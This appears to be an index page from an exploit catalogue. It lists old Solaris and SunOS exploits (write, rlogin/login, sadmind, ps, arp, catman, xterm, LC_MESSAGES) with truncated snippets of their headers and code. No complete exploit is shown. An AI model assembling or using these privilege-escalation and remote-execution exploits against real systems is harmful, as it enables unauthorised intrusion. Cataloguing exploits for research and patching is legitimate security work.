shadowbroker
This repository contains a collection of exploits and tools, including the "EARLYSHOVEL" exploit for RedHat 7.0-7.1 Sendmail 8.11.x, the "EBBISLAND EBBSHAVE" exploit for Solaris 6, 7, 8, 9 & 10, and the "ECHOWRECKER" exploit for remote Samba 3.0.x Linux. The repository also includes a payload...
Solaris 2.6 / 2.7 /usr/bin/write Local Overflow Exploit
No description provided by source. include stdio.h include unistd.h / /usr/bin/write overflow proof of concept. Tested on Solaris 7 x86 Pablo Sor, Buenos Aires, Argentina. 01/2000 [email protected] usage: write-exp shelloffset retaddroffset default offset should work. / long getesp asm"movl...
Solaris 2.5.1/2.6/7/8 rlogin /bin/login Buffer Overflow Exploit (SPARC)
Exploit for solaris platform in category remote exploits ======================================================================= Solaris 2.5.1/2.6/7/8 rlogin /bin/login Buffer Overflow Exploit SPARC ======================================================================= / $Id: raptorrlogin.c,v 1....
KAME Racoon - Initial Contact SA Deletion
KAME Racoon - Initial Contact SA Deletion // source: https://www.securityfocus.com/bid/9417/info It has been reported that it may be possible for attackers to remotely delete security associations SAs in hosts running the KAME IKE daemon Racoon. / Sun Microsystems Solaris sysinfo Kernel Memory...
Solaris /bin/login (SPARC/x86) - Remote Code Execution
/ 7350963 - /bin/login remote root exploit SPARC/x86 TESO CONFIDENTIAL - SOURCE MATERIALS This is unpublished proprietary source code of TESO Security. C COPYRIGHT TESO Security, 2001 All Rights Reserved bug found by scut 2001/12/20 thanks to halvar,scut,typo,random,edi,xdr. special thanks to...
Solaris_x86_mail_exploit.txt
Greetings, A few weeks ago I posted regarding an overflow in /usr/bin/mail on Solaris 2.7. I incorrectly stated that mail drops privs before the overflow occurs. Cheez Whiz, who wrote the shellcode, saw my post on Packetstorm and supplied the following information: ...The problem with your presen...
patchadd.pl
Here is an exploit to an old bug for patchadd in Solaris. It exploits a symlink vulnerability to clobber files with output from patchadd. This was written and tested on Solaris 2.8 Sparc with the current patch cluster applied. -- Larry http://vapid.dhs.org:8080 !/usr/local/bin/perl Exploit for...
Solaris 2.6 / 2.7 /usr/bin/write Local Overflow Exploit
Exploit for solaris platform in category local exploits ======================================================= Solaris 2.6 / 2.7 /usr/bin/write Local Overflow Exploit ======================================================= include include / /usr/bin/write overflow proof of concept. Tested on...
Solaris 7 / 8-beta arp Local Overflow Exploit
Exploit for solaris platform in category local exploits ============================================= Solaris 7 / 8-beta arp Local Overflow Exploit ============================================= / arp overflow proof of concept by email protected shellcode originally written by Cheez Whiz. tested o...
SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber
SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber !/usr/local/bin/perl -w The problem is catman creates files in /tmp insecurely. They are based on the PID of the catman process; catman will happily clobber any files that are symlinked to that file. The idea of this script is to watch the...
Solaris 2.7/2.8 Catman - Local Insecure tmp Symlink
!/usr/local/bin/perl -w The problem is catman creates files in /tmp insecurely. They are based on the PID of the catman process; catman will happily clobber any files that are symlinked to that file. The idea of this script is to create a block of symlinks to the target file with the current PID a...
solaris_LCmessages.txt
Subject: Question on Solaris LCMESSAGES libc exploit To: [email protected] Hello, A previous message stated that the LCMESSAGES bug in Solaris has been fixed in 7. However, I am still able to gain root with the below code on Sparc Solaris 7 5/99 Release boxes with MU2 and 7Recommended pat...
ff.core.sh
Date: Thu, 7 Jan 1999 12:28:59 -0500 From: John McDonald To: [email protected] Subject: really silly ff.core exploit for Solaris Hi, At the bottom of this email is an exploit I wrote a little bit ago for /usr/openwin/bin/ff.core on Solaris 2.5.1, and 2.6. I have tested it on a few machines, wi...
ps_expl.sh
--- psexpl.sh: cut here --- !/bin/sh Exploit for Solaris 2.5.1 /usr/bin/ps J. Zbiciak, 5/18/97 change as appropriate CC=gcc Build the "replacement message" :- cat psexpl.po psexpl.c include include include define BUFLENGTH 632 define EXTRA 256 int mainint argc, char argv char bufBUFLENGTH + EXTRA...
Solaris 2.5/2.5.1/2.6/7.0 - sadmind Remote Buffer Overflow (1)
Solaris 2.5/2.5.1/2.6/7.0 - sadmind Remote Buffer Overflow (1) // source: https://www.securityfocus.com/bid/866/info Certain versions of Solaris ship with a version of sadmind which is vulnerable to a remotely exploitable buffer overflow attack. sadmind is the daemon used by Solstice AdminSuite...
IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (5)
/ source: https://www.securityfocus.com/bid/268/info A buffer overflow in libc's handling of the LCMESSAGES environment variable allows a malicious user to exploit any suid root program linked against libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's...
Solaris 5.5.1 X11R6.3 - xterm -xrm Local Privilege Escalation
Solaris 5.5.1 X11R6.3 - xterm -xrm Local Privilege Escalation / X11R6.3 xterm exploit for solaris 5.5.1 by DCRH 28/5/97 / include include include include define EXTRA2 1300 define BUFLENGTH 400 define EXTRA 500 / Need an addr such that contents of addr+0xe98 = 0 / define SAFEADDR unsigned0xefff20...
Solaris 2.5.0/2.5.1 ps / chkey - Data Buffer
cat psexpl.po psexpl.c include include include define BUFLENGTH 632 define EXTRA 256 int mainint argc, char argv char bufBUFLENGTH + EXTRA; / ps will grok this file for the exploit code / char envp="NLSPATH=/tmp/foo",0; ulong longp; uchar charp; / This will vary depending on your libc / ulong...
Solaris 2.5.0/2.5.1 ps / chkey - Data Buffer
Solaris 2.5.0/2.5.1 ps / chkey - Data Buffer cat psexpl.po psexpl.c include include include define BUFLENGTH 632 define EXTRA 256 int mainint argc, char argv char bufBUFLENGTH + EXTRA; / ps will grok this file for the exploit code / char envp="NLSPATH=/tmp/foo",0; ulong longp; uchar charp; / This wi...
DSquare Exploit Pack: D2SEC_YPUPDATED
Name| d2secypupdated ---|--- CVE| 1999-0209 Exploit Pack| D2ExploitPack Description| Solaris ypupdated Command Execution Notes|...